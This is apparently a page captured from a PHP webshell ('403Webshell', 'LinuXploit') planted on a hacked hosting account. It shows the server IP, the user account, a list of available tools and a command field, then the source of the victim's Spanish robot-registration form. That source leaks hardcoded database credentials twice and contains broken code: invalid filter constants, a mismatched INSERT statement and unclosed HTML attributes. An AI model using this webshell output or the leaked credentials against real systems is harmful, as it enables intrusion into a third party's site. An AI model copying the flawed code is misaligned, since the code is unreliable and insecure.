- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 18.220.43.27
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/puertode/www/oficios/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/puertode/www/oficios/reg_old.php
<?php require('includes/config.php'); 

  $mysqli = new mysqli('localhost', 'rdcpunt1_test', 'Fortinet16@', 'rdcpunt1_test');

//if not logged in redirect to login page
if(!$user->is_logged_in()){ header('Location: login.php'); exit(); }

//define page title
$title = 'Panel de Control';

//include header template
require('layout/header.php'); 
?>
<style>
    
    .select-css {
 display: block;
 font-size: 16px;
 font-family: 'Arial', sans-serif;
 font-weight: 400;
 color: #444;
 line-height: 1.3;
 padding: .4em 1.4em .3em .8em;
 width: 400px;
 max-width: 100%; 
 box-sizing: border-box;
 margin: 0;
 border: 1px solid #aaa;
 box-shadow: 0 1px 0 1px rgba(0,0,0,.03);
 border-radius: .3em;
 -moz-appearance: none;
 -webkit-appearance: none;
 appearance: none;
 background-color: #FFFFFF;
 background-image: url('data:image/svg+xml;charset=US-ASCII,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22292.4%22%20height%3D%22292.4%22%3E%3Cpath%20fill%3D%22%23007CB2%22%20d%3D%22M287%2069.4a17.6%2017.6%200%200%200-13-5.4H18.4c-5%200-9.3%201.8-12.9%205.4A17.6%2017.6%200%200%200%200%2082.2c0%205%201.8%209.3%205.4%2012.9l128%20127.9c3.6%203.6%207.8%205.4%2012.8%205.4s9.2-1.8%2012.8-5.4L287%2095c3.5-3.5%205.4-7.8%205.4-12.8%200-5-1.9-9.2-5.5-12.8z%22%2F%3E%3C%2Fsvg%3E'),
   linear-gradient(to bottom, #ffffff 0%,#f7f7f7 100%);
 background-repeat: no-repeat, repeat;
 background-position: right .7em top 50%, 0 0;
 background-size: .65em auto, 100%;
}
.select-css::-ms-expand {
 display: none;
}
.select-css:hover {
 border-color: #888;
}
.select-css:focus {
 border-color: #aaa;
 box-shadow: 0 0 1px 3px rgba(59, 153, 252, .7);
 box-shadow: 0 0 0 3px -moz-mac-focusring;
 color: #222; 
 outline: none;
}
.select-css option {
 font-weight:normal;
}
</style>
<div class="container">

	<div class="row">

	    <div class="col-xs-12 col-sm-8 col-md-6 col-sm-offset-2 col-md-offset-3">
			
				<h2>Bienvenido: <?php echo htmlspecialchars($_SESSION['username'], ENT_QUOTES); ?></h2>
				<p><a href='logout.php'>Cerrar Sesion</a></p>
				<hr>
				<div class="row">
				    <?php
				  //Verifica si el formulario ha sido enviado correctamente
if(isset($_POST['submit'])){

    if (!isset($_POST['email'])) $error[] = "Por favor rellene el email";
    if (!isset($_POST['nombre'])) $error[] = "Por favor rellene el nombre del robot";
    if (!isset($_POST['equipo'])) $error[] = "Por favor rellene el nombre del equipo";
    if (!isset($_POST['piloto'])) $error[] = "Por favor rellene el nombre del piloto";
    if (!isset($_POST['copiloto'])) $error[] = "Por favor rellene el nombre del copiloto";
    if (!isset($_POST['escuela'])) $error[] = "Por favor rellene el nombre de la escuela";
   // if (!isset($_POST['categoria'])) $error[] = "Por favor seleccione la categoria";
    //   if (!isset($_POST['id_pais'])) $error[] = "Por favor seleccione su pais";


	$nombre = $_POST['nombre'];


	//very basic validation
	if(!$user->isValidUsername($nombre)){
		$error[] = 'Los nombres de robot deben tener al menos 3 caracteres alfanuméricos';
	} else {
		$stmt = $db->prepare('SELECT nombre FROM registro WHERE nombre = :nombre');
		$stmt->execute(array(':nombre' => $nombre));
		$row = $stmt->fetch(PDO::FETCH_ASSOC);

		if(!empty($row['nombre'])){
			$error[] = 'El nombre de robot proporcionado ya está en uso.';
		}

	}

	//if(strlen($_POST['password']) < 3){
	//	$error[] = 'La contraseña es demasiado corta.';
	//}

	//if(strlen($_POST['passwordConfirm']) < 3){
	//	$error[] = 'Confirmar contraseña es demasiado corta.';
	//}

//	if($_POST['password'] != $_POST['passwordConfirm']){
	//	$error[] = 'Las contraseñas no coinciden.';
	//}

	//Validamos el correo electronico
	$email = htmlspecialchars_decode($_POST['email'], ENT_QUOTES);
	if(!filter_var($email, FILTER_VALIDATE_EMAIL)){
	    $error[] = 'Por favor, introduce una dirección de correo electrónico válida';
	} else {
		$stmt = $db->prepare('SELECT email FROM registro WHERE email = :email');
		$stmt->execute(array(':email' => $email));
		$row = $stmt->fetch(PDO::FETCH_ASSOC);

	if(!empty($row['email'])){
			$error[] = 'El correo electronico ya esta registrado';
		}

	}

//Validamos la categoria
	$categoria = htmlspecialchars_decode($_POST['categoria'], ENT_QUOTES);
	if(!filter_var($categoria, FILTER_VALIDATE_CATEGORIA)){
	    $error[] = 'Por favor, introduce una dirección de correo electrónico válida categoria';
	} else {
		$stmt = $db->prepare('SELECT id_categoria FROM registro WHERE id_categoria = :categoria');
		$stmt->execute(array(':categoria' => $categoria));
		$row = $stmt->fetch(PDO::FETCH_ASSOC);

		//if(!empty($row['email'])){
		//	$error[] = 'El correo electronico ya esta registrado';
		//}

	}
	
	//Validamos pais
	$pais = htmlspecialchars_decode($_POST['pais'], ENT_QUOTES);
	if(!filter_var($pais, FILTER_VALIDATE_PAIS)){
	    $error[] = 'Por favor, introduce una dirección de correo electrónico válida pais';
	} else {
		$stmt = $db->prepare('SELECT id_pais FROM registro WHERE id_pais = :pais');
		$stmt->execute(array(':pais' => $pais));
		$row = $stmt->fetch(PDO::FETCH_ASSOC);

		//if(!empty($row['email'])){
		//	$error[] = 'El correo electronico ya esta registrado';
		//}

	}
	
	//Comprobamos que no exista error
	if(!isset($error)){

		//hash the password
//		$hashedpassword = $user->password_hash($_POST['password'], PASSWORD_BCRYPT);

		//Creamos el codigo de activacion
	//	$activasion = md5(uniqid(rand(),true));

		try {

			//Insertar la informacion ingresada en el formulario de registro
			$stmt = $db->prepare('INSERT INTO registro (email,nombre, equipo, piloto, copiloto,inte1, inte2,escuela) VALUES (:email, :nombre, :equipo, :piloto, :copiloto, :inte1, :inte2, :escuela, :categoria, pais)');
			$stmt->execute(array(
				':email' => $email,
				':nombre' => $nombre,
				':equipo' => $equipo,
				':piloto' => $piloto,
				':copiloto' => $copiloto,
				':inte1' => $inte1,
				':inte2' => $inte2,
				':escuela' => $escuela,
				':categoria' => $categoria,
				':pais' => $pais
			));
		//	$id = $db->lastInsertId('id');

			//send email
		//	$to = $_POST['email'];
			//$subject = "Confirmacion de registro a RDC 2.0";
			//$body = "<p>Gracias por registrarte en RDC 2.0 Winter Challenge.</p>
			//<p>Para activar su cuenta, haga clic en este enlace: </p>
			//<p>Una vez activado, ingresa para que registres tu Robot. <br> Saludos!</p>";

		//	$mail = new Mail();
		//	$mail->setFrom(SITEEMAIL);
		//	$mail->addAddress($to);
		//	$mail->subject($subject);
		//	$mail->body($body);
		//	$mail->send();

			//redireccionamos al index
			header('Location: index.php?action=joined');
			exit;

		//else catch the exception and show the error.
		} catch(PDOException $e) {
		    $error[] = $e->getMessage();
		}

	}

}
?>



<div class="container">

	<div class="row">

	    <div class="col-xs-12 col-sm-8">
			<form role="form" method="post" action="" autocomplete="off">
				<center><strong><h2>Registro de Robots</h2></strong></center>
			<!--	<p>¿Ya eres usuario? <a href='login.php'>Login</a></p> -->
				<hr>

				<?php
				//check for any errors
				if(isset($error)){
					foreach($error as $error){
						echo '<p class="bg-danger">'.$error.'</p>';
					}
				}

				//if action is joined show sucess
				if(isset($_GET['action']) && $_GET['action'] == 'joined'){
					echo "<h4 class='bg-success'>Registro exitoso, por favor revise su correo electrónico para activar su cuenta.</h4>";
				}
				?>
                
                	<div class="form-group">
					<input required type="email" name="email" id="email" class="form-control input-lg" placeholder="Dirección de correo electronico" value="<?php echo htmlspecialchars($_SESSION['email'], ENT_QUOTES); ?>" tabindex="1">
				</div>
				
				<div class="form-group">
					<input required type="text" name="nombre" id="nombre" class="form-control input-lg" placeholder="NOMBRE DEL ROBOT / ROBOT NAME *" value="<?php if(isset($error)){ echo htmlspecialchars($_POST['nombre'], ENT_QUOTES); } ?>" tabindex="1">
				</div>
				
					<div class="form-group">
					<input required type="text" name="equipo" id="equipo" class="form-control input-lg" placeholder="NOMBRE DEL EQUIPO / NAME OF THE TEAM *" value="<?php if(isset($error)){ echo htmlspecialchars($_POST['equipo'], ENT_QUOTES); } ?>" tabindex="1">
				</div>
				
				<div class="form-group">
					<input required type="text" name="piloto" id="piloto" class="form-control input-lg" placeholder="PILOTO / PILOT *" value="<?php if(isset($error)){ echo htmlspecialchars($_POST['piloto'], ENT_QUOTES); } ?>" tabindex="1">
				</div>
				
					<div class="form-group">
					<input type="text" name="copiloto" id="copiloto" class="form-control input-lg" placeholder="COPILOTO / CO-PILOT" value="<?php if(isset($error)){ echo htmlspecialchars($_POST['copiloto'], ENT_QUOTES); } ?>" tabindex="1">
				</div>
				
				<div class="form-group">
					<input type="text" name="inte1" id="inte1" class="form-control input-lg" placeholder="INTEGRANTE 1 / MEMBER 1" value="<?php if(isset($error)){ echo htmlspecialchars($_POST['inte1'], ENT_QUOTES); } ?>" tabindex="1">
				</div>
				
					<div class="form-group">
					<input type="text" name="inte2" id="inte2" class="form-control input-lg" placeholder="INTEGRANTE 2 / MEMBER 2" value="<?php if(isset($error)){ echo htmlspecialchars($_POST['inte2'], ENT_QUOTES); } ?>" tabindex="1">
				</div>
			
			
				<div class="form-group">
					<input type="text" name="escuela" id="escuela" class="form-control input-lg" placeholder="ESCUELA O INSTITUCIÓN / SCHOOL OR INSTITUTION" value="<?php if(isset($error)){ echo htmlspecialchars($_POST['escuela'], ENT_QUOTES); } ?>" tabindex="1">
				</div>
				
					<div class="form-group">
				 <label for="cat">Selecciona Categoria:</label>
 <select class="select-css" name="categoria" id="categoria >
               <option value="<?php if(isset($error)){ echo htmlspecialchars($_POST['id_categoria'], ENT_QUOTES); } ?>">Value 1</option>
            </select>
				</div>
				
				
					<div class="form-group">
					    <label for="pa">Selecciona País:</label>
					    <select class="select-css" name="paises" id="pais>
                <?php
                $conexion = mysqli_connect("localhost", "rdcpunt1_test", "Fortinet16@", "rdcpunt1_test");
                 $acentos = $conexion ->query("SET NAMES 'UTF8'");
                $sql = "select id_pais,nombre_pais from lista_paises";
                $consulta = mysqli_query($conexion, $sql);
                
                // Lectura de la consulta en el cuadro desplegado del formulario
                while ($fila2 = mysqli_fetch_array($consulta)) {
                    echo "<option value=\"$fila2[id_pais]\">$fila2[nombre_pais]</option>";
                }
                ?>
            </select>
				
				</div>
			
				</div>

				<div class="row">
					<div class="col-xs-6 col-md-6"><center><input type="submit" name="submit" value="Registrar" class="btn btn-primary btn-block btn-lg" tabindex="5"></center></div>
				</div>
			</form>
		</div>
	</div>

</div>
          
		</div>
	</div>


</div>

<?php 
//include header template
require('layout/footer.php'); 
?>

Youez - 2016 - github.com/yon3zu
LinuXploit